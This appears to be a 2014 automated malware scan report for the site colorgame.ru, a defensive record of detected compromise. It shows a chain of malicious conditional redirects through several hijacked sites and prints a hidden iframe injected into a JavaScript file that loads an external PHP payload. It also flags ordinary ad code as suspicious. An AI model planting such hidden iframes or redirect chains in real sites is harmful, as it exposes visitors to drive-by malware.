Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://colorgame.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: colorgame.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 12 Jul 2014 00:15:01 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 00:14:14 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 00:14:14 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.30 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 12 Jul 2014 00:14:15 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
| Request | Server response | Status |
http://colorgame.ru/ | 200 OK Content-Length: 14790 Content-Type: text/html | clean |
http://colorgame.ru/media/system/js/core.js | 200 OK Content-Length: 4683 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 13x14 style: hidden src: http://amamaza.com/images/1/123.php <iframe src="http://amamaza.com/images/1/123.php" width="13" height="14" frameborder="0" style="visibility: hidden; display: none"> | ||
http://colorgame.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://colorgame.ru/media/system/js/caption.js | 200 OK Content-Length: 800 Content-Type: application/x-javascript | clean |
http://colorgame.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238128 Content-Type: application/x-javascript | clean |
http://colorgame.ru/plugins/system/helix/js/menu.js | 200 OK Content-Length: 4164 Content-Type: application/x-javascript | clean |
http://colorgame.ru/plugins/system/helix/js/totop.js | 200 OK Content-Length: 1029 Content-Type: application/x-javascript | clean |
http://userapi.com/js/api/openapi.js?45 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6853 Content-Type: text/javascript | clean |
http://colorgame.ru/otpravit-svoju-statju | 200 OK Content-Length: 13390 Content-Type: text/html | clean |
http://colorgame.ru/media/system/js/validate.js | 200 OK Content-Length: 2923 Content-Type: application/x-javascript | clean |
http://colorgame.ru/ischem-druzej-dlja | 200 OK Content-Length: 12377 Content-Type: text/html | suspicious |
Suspicious code found <div id="lx_378606"></div><br /> <center><script type="text/javascript"><!-- google_ad_client = "ca-pub-7044264176206199"; /* new game */ google_ad_slot = "7148357603"; google_ad_width = 468; google_ad_height = 60; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script></center> | ||
http://colorgame.ru/tjurjaga | 200 OK Content-Length: 14657 Content-Type: text/html | suspicious |
Suspicious code found <center><script type="text/javascript"><!-- google_ad_client = "ca-pub-7044264176206199"; /* new game */ google_ad_slot = "7148357603"; google_ad_width = 468; google_ad_height = 60; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script></center> | ||
http://colorgame.ru/zombi-ferma | 200 OK Content-Length: 17180 Content-Type: text/html | suspicious |
Suspicious code found <center><script type="text/javascript"><!-- google_ad_client = "ca-pub-7044264176206199"; /* new game */ google_ad_slot = "7148357603"; google_ad_width = 468; google_ad_height = 60; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script></center> | ||
http://colorgame.ru/bezumie | 200 OK Content-Length: 12027 Content-Type: text/html | suspicious |
Suspicious code found <center><script type="text/javascript"><!-- google_ad_client = "ca-pub-7044264176206199"; /* new game */ google_ad_slot = "7148357603"; google_ad_width = 468; google_ad_height = 60; //--> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script></center> | ||
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=colorgame.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://colorgame.ru/
Result: colorgame.ru is not infected or malware details are not published yet.
Result: colorgame.ru is not infected or malware details are not published yet.